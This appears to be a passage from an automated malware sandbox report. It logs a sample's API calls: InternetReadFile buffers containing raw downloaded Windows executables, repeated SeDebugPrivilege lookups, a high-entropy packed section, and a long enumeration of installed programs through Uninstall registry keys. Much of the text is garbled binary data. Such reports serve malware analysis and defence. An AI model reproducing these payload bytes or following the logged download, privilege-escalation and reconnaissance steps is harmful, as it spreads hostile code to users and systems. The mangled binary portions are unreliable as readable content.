ÓÉ~`__óŒ6ÓvÓV[NJ ÓÉ~`__óŒ6ÓvÓf[NR v B^^ۚRs¿Ý›š^^^ۗ+Og„O‡&ݛÕ^^^g€‡Zˆ¢¤¿^^^g„gˆÛt OÛ†;¼gŒÝtŒ^^^¦^^^gې–ۜëۃ%ˆó”þO“Ý”Ñ^^^Ûs>¦_^^^gˆÝÝ^^^gŽœü‹g†gsg‹Ý˜ž^^^—ÙgpžgÓ jÓf#*OÚP]^^ÓjÓ f3 *ÕɆ`__Óf[®Õق`__—ÙŠ`__^^^^Óъ`__#ªOۄ^^^Óɂ`__Óf[\Õَ`__Óт`__Ó ZÛtVtÕɒ`__Óق`__۞VÕٖ`__—Ùš`__^^^^sOÓњ`__۝]Õњ`__Óɚ`__#ɒ`__áÓٖ`__O§VeRÛ}[ê)Óɖ`__O§\9_O^^Óю`__ÓJ][Ɇ`__Óٖ`__O§VÝ}_O^^Óَ`__ÕJVÓі`__۝\Õі`__sÒÓɂ`__Óي`__[ZÕي`__Óі`__Õт`__uG___g„ Û^^^Ýw¦^^^O“OÝ˜b^^^£j^^^Ûtݗ‹^^^ۏ!ݔg^^^۔ùÛ|Lgsgogs݀„^^^g€ݗf^^^gtgsÛpgtgpÝo§^^^OˆšÛ†ßÝÑ^^^”§‡cݏ®^^^gvgŒ.O––8gogtÛsýۘãۖÓ jÓf[ÜÞ^^^Õz—Ùž`__^^^^sOÓў`__۝]Õў`__Óɞ`__óŒJÓzÛâNN^OÚO]^^Óў`__ó•JÓ zÓf[TRÕÙª`__ÓѪ`__ _IF~^ÕÙ¢`__Û¡¢`__^é\s»Óɞ`__óŒJÓzÓf[NNÕѦ`__—Ù®`__^^^^sOÓÉ®`__ۜ]ÕÉ®`__ÓÙ®`__ÓѦ`__Û"Ý^OÚÕ^^^ÓÉ®`__ÓÙ¦`__Óf[RÎÕѶ`__ÓÉ®`__ÓÙ¦`__O§RÎ ÓÉ¢`__ _IJ~^ÕÙ²`__Û¡²`__^éAÓÙ¶`__۞\ÓÑ¢`__ _IJ~^ÕÙ²`__Óɞ`__óŒJÓzÓf[NNÓÉ®`__ÓÙ²`__ÕZÍu ___u“`__ÛpRgpÛ{ög†œÄ†Ý‹Æg‹g‡g„Û
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZ€ÿÿ@@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL²ˆ™dà HvD2@õ.textytv àe‚|³P^¡¿jV%ý} ÕG YJ%¹Ó ŒªüB ϸ"7ôàÀð–T‹·TëÕ—1xjÕ$‰!ÌI7#G«7qa`öGÓ¤Â¤_ª¦ÎÀDn\Ä¢oÔ¯‡°×x^=ÑöàÝ4v¥,¬û¿ð3ž­æœÀƒ*çyÇÍ:½~Oð¬[·&Œ°L~í†[8i,ˆ5D¦röv„Î'j>šï@ÃÑÄéæ͌°×²ÚLR~Æm=Oª°h“ €ÁޏgÈHè°³¯¶ 厝}0§ø`¾âœ ‹×~A?ZìP»b1 f,óë.éʬ•RºUµS¤†g ŒðÞófò_ïøÛB'³wUŸ}+Öï#ú×=,ÉÝÔ¡vÚËÍK_#ý¡—wE&…ÙÚÖ]—DÔï”C©#å¤mµO´7À=îœv€!¹çÏÁaŽ"-‰GH©Ô3&ûŽ™Vxê±wÐóg¾¢%ÑMJ£ËLŸ‡öƒ™Ï²1#0|Cyã—vt-ƍԐ øý$*Kx`è$Á»#8§ Q¯ «V ’d#Äèé{“fÃå' üÒnÜtu„ˆ(rƒì‰<$tuFáqVèutÃs‹4$ƒÄë āîÍë¢ëõÄ¢ëÀó±ñˆÆë X’V_ë–rëø«¬ë ²ñˆ0ЪâóutÔÓƋ4$ƒÄutËB΃ċ|$üÃU‰åVWëB1Ohn‹$ƒÄë\CëïŠë qü j`YëAë÷_ëãië¶ëº(ëa×ëõ:èCÿÿÿ’+ˆ™ £e$£] ¡ßyéÁ*…øƒÊÒq«É+\.„ø‚ÊÒÃ:ìÏ@F:((£, «ì,Ã-<AÃÇÓÃ"xWbBHqÃ-é4ÃßNÃ%_wY1’(((Ã-·ÃÝÀËÖ××_^ÉÂU‰åUSVWë Ñ2.¸!ë–dëõ–ë_‡‰GKh‹ $ƒÄëVŠëïœë|w…×.j2‹$ƒÄë—ëòÊèþÿÿg¹G:¹O>éÌõßòž=„â*òÚ11G Ú·2222ú G5ž6 A0TŸ£Á–ÄðòJ+£G8²ÈÚd222Ù:žÌþÄðF/ÌþÙ+H<²È’´ÒÚ2220Ù4ÄðG7ž´Òž§ 560;G&Ú2222ú*G;ž6*A6FTŸ£¤=ß¿F2Á–¤ÛDÍÍÍÇâêÚ5222:úâòÓñÄíK1¡ž¡ƒ6àùƒ=ëñoO>Ù?،¶Z!22jÙ7#ÙÆßÙ&T{xœ8Z2322¹>±ö6Ù7ý>ÙÝ;Ù#a± X¹&±ö6Ù7pFÙÀ´Ú¢ÏÍ͉ø_^[]ÉÂU‰åƒì SVWë orG£¸tëgˆëõë;àƘ@sh YëSíëô·ë ô÷ü•‘ºëð5ëõ¹è=ýÿÿˆ^ 2ÊF÷ˆNŠˆvˆ~TUTUë™þüü®ŽVûŠŽVÿŠŽF÷2Êik3QRSiüüP†Ãvüv÷Uëýüü8FûvˆNŠèÄF÷]\TUëQþüüè µ2Õ¢Ækw[èv©è÷¦èKúŸk£ZèÎÆè÷Åè_c ¹èîèö8ëžÿüü‹Eô_^[ÉÂU‰åƒì`SVWë ´ÎPì¸këWëõâëãÆø¿Eh•‹ $ƒÄë\Òëïëé7ðZh„Zë:ÞëôèFüÿÿٌµ{ ùHâlâDð‡{ÁH{×ÌD‹¤‡„„ Á ñ$ ºÒÔ{×È‚D‹ƒ‡„„ ÉT … ý€ ñ\îœÒ{הC‚œ„„„ v ÉT ÁtÕÖîÄÔ{×ôD‹\†„„ Ápî†ÓÓÔî{î{{ñt{„„„D‹?†„„ ù| Á4 ü€C„„Ô„„ ñ(Ó섄„Œî€ÔÓî‚Ò{×ðDñÞ{ñ4 ÁL Á8 ¼ ÉLî€Óî…ÕÓÓÓÔî{{²{×üDñ³ Á@ ¼ ÉLî€Óî…ÕÓÓÓÔ{ñp{²{×üDññ8쀅„„ÒÓ{פÁ Œ†„„{Á| Á4ɔE„„…„ ü€ Œ ñ,Ó섄„ŒîÄÔÓîŠÒ{×ðD‹‹†„„ù|„‹†„„{ñ4 ÁL Á< ¼ ÉLî€Óî…ÕÓÓÓÔî{{²{×üD‹Z…„„ ÁD ¼ ÉLî¤Óî…ÕÓÓÓÔ{ñp{²{×üD‹8…„„l„„„„ñ€ð†T@@€ð xoŽŒjt’„„oŽoqŒŽo€“3u Bö҄„o|PVì©„„ˆ @€o½pok8o”íMÒKsyì䦄„ÞoŠxopQoˆ3£ˆícöÖÜo}o|Òo…3EfoÀá3u …FoÈè3u µDo†!=(oÈú3u …Fo…f@o 3u vËcGo‚ ­Poo} ñˆ‡²‹3Ê‚Ò vùH„ðŒFŒ…„„o‚F|„„„ÕΔMðŠþˆ‡ù<ö‡ñˆw F¬Ýf`ÚùH„ðâl„„„„Ûka“„„ } ~EM«„„Fœ„„ Ž |M«„„ì)…„„Ôlž~{{ÁD uÑ<„„„„·„ } ~E´„„Fºœ„„ Ž¬‡ÁDÉ@Ñp„„„„·„oåÒÒ°¯ÑD 2$„„„²‡ñ<º„ð¬ºʀmŒUmBŒµDâ)-„´„„ðˆ¡{‹„„‡Á<…|­”fcoWÚʬ‡ÉDµ{ Áx ¼ÓÔ{ñ@ÕÓÓÓÓÓ{ñp{„„„o‰ìl‡„„{טmLx{{oŠ×ö~Äì„Üoü]op[o–…ŽãŒì‡„„ˆ @€oJžok!o¬s#¦þ섄„ @€oVokÛl5|{{_^[ÉÂU‰åƒìSVWëÅ'KhZ‹$ƒÄëê¾ëïë<iC·jw‹ $ƒÄë6ëòë7MÄhNj$ƒÄëUÏëïxèWøÿÿLšÏ¯OÔÇÇ8”ÛJ‚;—8²×8²Ë”/q=88B³Ê8²Ó8²;—”/_<88­Ç­88Ô,Ó"¦°´z¯ÞÇÇLÃãDÃ,Œ,(¤,Éê ɒ~°ÇÇÇ,“\,2ª,È`{ƒ¯ÇÇǝ,ÂÓ(,3Ó/'088_^[ÉÂU‰åìTSVWëRkŠh"‹$ƒÄëa.ëïë iqt¹Üë›6ëõOë jŽ·"jZëº@ë÷ñè÷ÿÿ“EðmlåÞkFó™ö2ó0óí0óPQ¢é™ÞjNó\¾Q·Âpã5AóPFóìUó þ:…px:“ <›Üó€Ró÷óWÂJ“<›Üóqßóë/óþÙú󔇢éÚ󜾢é)Øó ô´ó˜¨¢éÚóúÚóØڢ鐙ê‹WÿÛóÔ1ÌóóáԐ•­¨ãççNrrççKDØœÔ•´ãç略¬ãççHr Orç.çKxØœµ™g8›¸•­¤åççpNrçK8ð*hjw{}kk8{ytt8{j}yl}8:=k:@NHOçKH›Ü•mÜr$NçKß$ðjmvyk@‘^ðouq{@‘^‘f çK\‘^NçKpØlàrrçç ó [wàÄp:“<›Üó¡ùó÷:ó$/Û6úpÄAóŒ¬óìóJ®µ¢r“ <›ÜóÜóêÊð«íçç_^[ÉÂU‰åSVWë0ܼȟhW‹$ƒÄë^¬ëïÑëÆ-³¤j`‹ $ƒÄëìfëò½ëįíh¶‹$ƒÄëΖëïwèZõÿÿ=ë¾=ú3@¯‡v?AÐÐ3v¸æI%¶¶¶5r²Ð]]]¹‹j”ËÞ᪶¶î]³8]B\]¸È¬‡Ö¶¶¶]³”¤]C8]ºÎ‰ ¶¶¶]³uT]Cñ^LBII_^[ÉÂU‰åƒìSVWë0?¸h ‹$ƒÄë,ÞëïëxwJÑû¼hÖYëwMëôïëJ5óŸðº’ëËëõ¸è¤ôÿÿU×n“’’’Ϛ£RçžeÅô?ôRæœÂm:’’’V–ô9yyzՒ’’ã’÷’ÿ’ç’’’’’’’ä’û’à’æ’û’ý’’’ä’ÿ’å’ó’à’÷’’’ä’ð’ý’ê’’’’’’’ê’÷’ü’’’’’’’’’’Ìͬ’æ†ÄÅm2’’’VšRç•Tœyuy•U×n’’’’yœø¼ÎúŸ’’Êy—²ÔyfWy`V™F8Ï+D’’’y—Úyg’yœ¿óð·V(’’’y—Îúygaz\amm‹Eü_^[ÉÂU‰åƒìSVWë'f+›h=
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyá–å~Lyá–â~Ryá–ä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPEL­O‰dà! ތ>ð°@ Jœ<K<€øT ?p?@ð,.textVÝÞ `.rdataîaðbâ@@.dataD` D@À.rsrcø€P@@.relocTR@Bj h¨<¹phè?#hêèŒ*YÃÌÌÌj8hÌ<¹ˆhè#h`êèl*YÃÌÌÌj8hÌ<¹ hèÿ"hÀêèL*YÃÌÌÌj8hÌ<¹¸hèß"h ëè,*YÃÌÌÌj8h=¹Ðhè¿"h€ëè *YÃÌÌÌj0hD=¹èhèŸ"hàëèì)YÃÌÌÌj0hx=¹iè"h@ìèÌ)YÃÌÌÌh€h°=¹iè\"h ìè©)YÃj?h€>¹0iè?"híèŒ)YÃÌÌ̋ÁÂÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèÂ2ƒÄ‹Æ^]ÂÌÌ̋I¸|<…ÉEÁÃÌÌU‹ìV‹ñFÇ”ñPèó2ƒÄöEt j Vè«%ƒÄ‹Æ^]AÇ”ñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀ‹ÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌU‹ìƒì MôèÒÿÿÿhˆJEôPè›2ÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèò1ƒÄÇìñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPè²1ƒÄÇ ñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹ZVWQS‹ñè‹=€h3É3À‰}ü…Û~53Ò;NjþEЃ=„h¸phCphƒ~r‹>ŠˆA‹}üB;Ë|˃~r‹_Æ‹Æ^[‹å]Ã_Æ‹Æ^[‹å]ÃÌÌÌÌÌU‹ìƒìSVW‹ò‹ùQ‰}ô‹FP‰Eðè“3ۉ]ø9]ðŽ)Dƒ~‹Ær‹¾Pè¯KƒÄ…Àu-‹N‹Æƒùr‹€< t‹Æƒùr‹ƒ‹Ïr‹Šé̃~‹Ær‹‹=@i3ҋ Di…ÿt+ŠˆEÿfDŠ]ÿƒù¸0iC0i8‹]øtB;×ráƒÊÿ‹E‹Èƒxr‹3À…ÿt.Š ˆMÿDƒ=Di¹0iŠ]ÿC 0i8‹]øt@;Çr݃Èÿƒ=Di¹0iC 0i‰Mì‹Mô‰Møƒyr‹ ‰Mø‹Ï+ȍ 3Ò÷÷‹Mì‹}ôŠ ‹MøˆC‰]ø;]ðŒÜþÿÿƒr‹Æ‹Ç_^[‹å]ÃÆ‹Ç_^[‹å]ÃÌÌÌÌÌÌÌÌÌÌU‹ìƒì@SVW‹Ù‹òQMĉ]ôèçýÿÿEċÖPMÜèYþÿÿhÇCÇCÆè°"‹Ø¹ƒÈÿ‰]ø‹ûƒÄ ó«3Ò„¾Š8>‰‹Bƒú@|ð‹Uì3ö3ۍ~ø…ÒtA‹Møƒ}ðEÜCEܾ‹ƒøÿt'ÁæðƒÇx‹Ï‹ÆÓø‹MôPè‹Uìƒï‹MøC;Úr‹Eø…ÀthPèð!ƒÄ‹Uðƒúr(‹MÜB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwVRQèÀ!ƒÄ‹UØÇEìÇEðÆE܃úr(‹MÄB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQè~!ƒÄ‹Eô_^[‹å]Ãè›GÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì4‹E0SVW3ÿÆEè¾…À„‹]ÇEàÇEäÆEÐ;Ç‚´+ǍMÐ;ÃB؃}4E CE SÇPèƒþr.‹MèV‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡hRQè× ƒÄMЃ}Uó~EàEèCUƒ}ä‹uà‹]f~ÉMèCÁfÖEø;óu\ƒîr‹; uƒÀƒÂƒîsïƒþü„îŠ: u7ƒþý„ߊH:Ju&ƒþþ„ΊH:Juƒþÿ„½Š@:B„±‹E0G‹uü;ø‚õþÿÿ3ÿ‹Uƒþr/‹MèF‹Áþr‹IüƒÆ#+ÁƒÀüƒø‡’VQè ‹UƒÄ‹Eƒør'H‹Âùr‹RüƒÁ#+ƒÀüƒøw`QRèσċU4ÇEÇEÆEƒúr3‹M B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwë ‹uüGéWÿÿÿRQ肃ċÇ_^[‹å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹]V‹ñ‰]üWjhÀ>ÇFÇFÆèD3ÿ…Û~1ƒ}ECEŠ8S¿C €ú¶È¶ÃGȶÁ‹ÎPèG;}ü|ϋUƒúr(‹MB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèуÄ_‹Æ^[‹å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì0VWj$hÄ>MÐÇEàÇEäÆEÐè—‹E…Àu3öéÇ3ÿ…À„¸ÇEøÇEüÆEè;Ç‚F+ǹ;ÁBȃ}ECEQǍMèPèBƒìEЋÌPètƒìEè‹ôƒì‹ÌPèa‹ÎèªþÿÿƒÄè¢üÿÿ‹UüƒÄ0…À„šƒúr,‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡¹RQèǃċEG;ø‚Hÿÿÿ¾‹Uäƒúr(‹MÐB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwxRQ膃ċUƒúr^‹MB‹ÁúrF‹IüƒÂ#+ÁƒÀüƒøwHë4ƒúr(‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒøw#RQè1ƒÄ3öétÿÿÿRQè ƒÄ_‹Æ^‹å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌU‹ìQ‹E‹U‹MV…À„‚S@WPè] ƒÄMƒ}‹Ø‹ÓCM+ъIˆD ÿ„Àuó‹óNŠF„Àuù+ñFVjÿðV‹øSWÿðPèÇ5ƒÄ WÿðjÿñÿñWjÿñÿ ñ‹U‹M_[^ƒúr%B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèAƒÄ‹å]ÃèdBÌÌÌÌU‹ìƒì$SVW‹ùjÇGÇGÆÿñ…À„‡j ÿ$ñ‹Ø‰]ü…Û„lSÿð‰Eô…À„SjjjjjÿPjhéýÿ ð‹ð‰uø…öŽ.‹WN;Êw‰O‹Çƒr‹ÆëF‹G‹Ù+Ú+Â;Øw%ƒ‹Ç‰Or‹S4jVèE,ÆƒÄ ‹uøëQSÆEø‹ÏÿuøS訋]üƒ‹Çr‹jjVPjÿÿuô
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x00069a00', u'virtual_address': u'0x00011000', u'entropy': 7.766836890095274, u'name': u'.data', u'virtual_size': u'0x0006b62c'} entropy 7.7668368901 description A section with a high entropy has been found
entropy 0.872033023736 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x000003e8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

 regkey_r: 7-Zip
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
1 0 0

RegOpenKeyExW

 regkey_r: AddressBook
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

 regkey_r: Adobe AIR
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR
1 0 0

RegOpenKeyExW

 regkey_r: Connection Manager
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

 regkey_r: DirectDrawEx
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

 regkey_r: EditPlus
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

 regkey_r: Fontcore
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

 regkey_r: Google Chrome
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

 regkey_r: Haansoft HWord 80 Korean
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

 regkey_r: IE40
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

 regkey_r: IE4Data
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

 regkey_r: IE5BAKEX
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

 regkey_r: IEData
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

 regkey_r: MobileOptionPack
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

 regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko)
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)
1 0 0

RegOpenKeyExW

 regkey_r: Office15.PROPLUSR
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR
1 0 0

RegOpenKeyExW

 regkey_r: SchedulingAgent
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

 regkey_r: WIC
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

 regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}
1 0 0

RegOpenKeyExW

 regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

 regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

 regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}
1 0 0

RegOpenKeyExW

 regkey_r: {4A03706F-666A-4037-7777-5F2748764D10}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}
1 0 0

RegOpenKeyExW

 regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0015-0409-0000-0000000FF1CE}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0016-0409-0000-0000000FF1CE}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0018-0409-0000-0000000FF1CE}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0019-0409-0000-0000000FF1CE}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-001A-0409-0000-0000000FF1CE}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-001B-0409-0000-0000000FF1CE}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-001F-0409-0000-0000000FF1CE}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-001F-040C-0000-0000000FF1CE}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-001F-0C0A-0000-0000000FF1CE}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-002C-0409-0000-0000000FF1CE}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0044-0409-0000-0000000FF1CE}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-006E-0409-0000-0000000FF1CE}
base_handle: 0x000003e8
key_handle: 0x000002a8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0090-0409-0000-0000000FF1CE}
base_handle: 0x000003e8
